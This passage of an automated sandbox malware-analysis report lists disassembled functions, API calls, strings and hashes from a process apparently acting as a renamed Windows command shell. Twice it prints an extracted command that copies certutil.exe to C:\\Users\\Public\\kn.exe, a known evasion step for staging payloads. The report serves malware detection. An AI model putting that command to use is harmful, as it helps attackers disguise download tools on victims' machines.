                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 1606811317-2340392073
                                                                                                                                                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                        • Instruction ID: af50cc434e3d40058c113cf3344a62c49fa02eed74dead18b1b2c786645ccac8
                                                                                                                                                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 4CD19D63A18A42C1EB119F25A8043B967A0FF46B94F844232DE5DC77A5DF3EE44DC70A
                                                                                                                                                                        Function 00007FF6E94503AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                        • String ID: %04X-%04X$~
                                                                                                                                                                        • API String ID: 2748242238-2468825380
                                                                                                                                                                        • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                                                                        • Instruction ID: 655fa947be2b51b3f90572ffcd6b9b1239f1dfb369a84b7a82002525856af110
                                                                                                                                                                        • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                                                                        • Instruction Fuzzy Hash: 55A17AA3708AC2CAEB258F6098503E977A1FF85B85F408135DA4D8BB88DF3DD649C705
                                                                                                                                                                        Function 00007FF6E943662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E9436677
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E943668F
                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF6E94366A3
                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF6E94366C4
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E94366E4
                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E94366FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                        • Instruction ID: 477acbd761238d7741ba9b8eca1c649ce31b9eb53aa349a22d964059ce737e0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C716B63D08A47C6E7609F31D41927D77A0EF49B84F94C031DA4E86294EF3EA488CB1A
                                                                                                                                                                        Function 00007FF6E9429400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                        • String ID: FAT$~
                                                                                                                                                                        • API String ID: 2238823677-1832570214
                                                                                                                                                                        • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                                                                        • Instruction ID: 878751c5139dc4e08cbc618ef001067b13943dd24054a6a0e0df290a180eae3b
                                                                                                                                                                        • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 08715773608AC1CAEB21CF2098543EA77A4FF85B89F448435DA4D8BB59DE39D249C705
                                                                                                                                                                        Function 00007FF6E942D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D884
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D89D
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D94D
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D964
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E942DB89
                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF6E942DBDF
                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF6E942DC63
                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF6E942DD33
                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF6E942DE9A
                                                                                                                                                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942DF1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1051989028-0
                                                                                                                                                                        • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                        • Instruction ID: fc58f6e6a60ed0eb9685c6fab6aa7dbc9b2c8c54bc71943d8927a9cb762913cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                        • Instruction Fuzzy Hash: D9028D73A18B42C2EA24AF15A41037A76E4FF85B94F554231DA8DC7B94DF3EE049C709
                                                                                                                                                                        Function 00007FF6E94286B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                        • Instruction ID: 325189a407e551eaac11181667473d48774ef0d91f6da918dc57e357d9b1de40
                                                                                                                                                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                        • Instruction Fuzzy Hash: 56517D76A08642C5EB148F65A8003BD7BA0FF49B90F188135C91E873A1EF3EE049C71A
                                                                                                                                                                        Function 00007FF6E9432B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                        • API String ID: 0-3124875276
                                                                                                                                                                        • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                        • Instruction ID: 6d6860de9fedaddf0d9aaffc94c032fe3b19ab9cfe0608da882825f1b49bbd74
                                                                                                                                                                        • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                        • Instruction Fuzzy Hash: 48514662A0C643C2FB14AF31A4183B937A5BF45B85F508135DA0ECA3A5DF3EA44DC75A
                                                                                                                                                                        Function 00007FF6E944BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
                                                                                                                                                                          • Part of subcall function 00007FF6E943081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E943084E
                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF6E944C1C9
                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944C31C
                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6E944C5CB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                        • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                                                                                        • API String ID: 2242554020-619615743
                                                                                                                                                                        • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                        • Instruction ID: 47be48b92f2a87323568e64e96703d35d6a167ff7d26527d23e3c949861e0ea1
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                        • Instruction Fuzzy Hash: 0412D623A18652C1EA24DF24A4447FA63A0FF44BA1F584335D95D837E4DF3EE54ACB0A
                                                                                                                                                                        Function 00007FF6E9436FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E9437013
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9437123
                                                                                                                                                                          • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943706E
                                                                                                                                                                        • wcsncmp.MSVCRT ref: 00007FF6E94370A5
                                                                                                                                                                        • wcsstr.MSVCRT ref: 00007FF6E943F9DB
                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA00
                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA5F
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: FindFirstFileExW.KERNELBASE ref: 00007FF6E9438280
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E943829D
                                                                                                                                                                          • Part of subcall function 00007FF6E9433A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA3D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                        • String ID: \\.\
                                                                                                                                                                        • API String ID: 799470305-2900601889
                                                                                                                                                                        • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                                                                        • Instruction ID: 3818eb19fcad8224533479dbe03dc5431e07b6702dfe1434412637a1ea169317
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                                                                        • Instruction Fuzzy Hash: B9518D33A08A82C6EB60DF31A8043B967A0FF89B94F454535DA5E87794DF3ED549C305
                                                                                                                                                                        Function 00007FF6E9428B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1944892715-0
                                                                                                                                                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                        • Instruction ID: bd09b106be35f47bc70c954fda5148d5f205fe5e28627557b3a28b89fbc45013
                                                                                                                                                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                        • Instruction Fuzzy Hash: F5B16D73A09742C6EB649F62A4543BD66A0FF59B80F448135CA4EC7391EF3EE448C70A
                                                                                                                                                                        Function 00007FF6E9425458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94254DE
                                                                                                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E942552B
                                                                                                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E942554F
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E944345F
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E944347E
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E94434C3
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94434DB
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E94434FA
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: _get_osfhandle.MSVCRT ref: 00007FF6E9433715
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9433770
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433791
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1356649289-0
                                                                                                                                                                        • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                        • Instruction ID: 595740f22b6bf03af0a132f81c4a85c379547639df88160ef9ea5fe091e80cb2
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                        • Instruction Fuzzy Hash: 67917033A08642D7EB289F21A50427DB6A1FF89B84F484135DE4E83795DF3EE449CB09
                                                                                                                                                                        Function 00007FF6E94486FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                                                                        Download Yara Rule
